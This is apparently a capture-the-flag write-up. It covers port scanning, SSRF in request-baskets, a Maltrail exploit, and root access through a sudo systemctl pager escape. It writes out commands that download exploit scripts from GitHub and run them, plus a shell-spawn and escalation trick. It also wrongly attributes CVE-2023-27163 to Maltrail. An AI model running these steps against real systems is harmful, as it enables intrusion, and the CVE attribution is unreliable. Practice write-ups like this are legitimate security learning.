Information Gathering

Port Scan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-16 18:30 WIB
Nmap scan report for
Host is up (0.027s latency).
Not shown: 997 closed tcp ports (conn-refused)
22/tcp    open     ssh
80/tcp    filtered http
55555/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 1.56 seconds

Initial Access

80 port seem interesting but we got filtered. maybe some service running on 80 and only internal can access. web server runnig on port 55555, the web application is request-baskets we can idenfity in footer section

this version is vulnerable to CVE-2023-27163, this vulnerability name is SSR. next, we can see what is application on 80 running via this exploit. so we can perform exploit using this command

wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
bash CVE-2023-27163.sh

now, we can access

we can know from the footer section, Mailtrail running on 80. Powered by Maltrail (v0.53) is vulnerable to CVE-2023-27163. so let’s exploit this

wget https://github.com/spookier/Maltrail-v0.53-Exploit/raw/main/exploit.py
python3 exploit.py 1337
Running exploit on

Privilege Escalation

let’s check the sudo

python3 -c "import pty;pty.spawn('/bin/bash')"
sudo -l
User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

we found that, let’s try the command

/usr/bin/systemctl status trail.service

at the bottom terminal is hanging, it’s like we run vim, we can quit via type q and hit enter. but we can also type !sh to get root access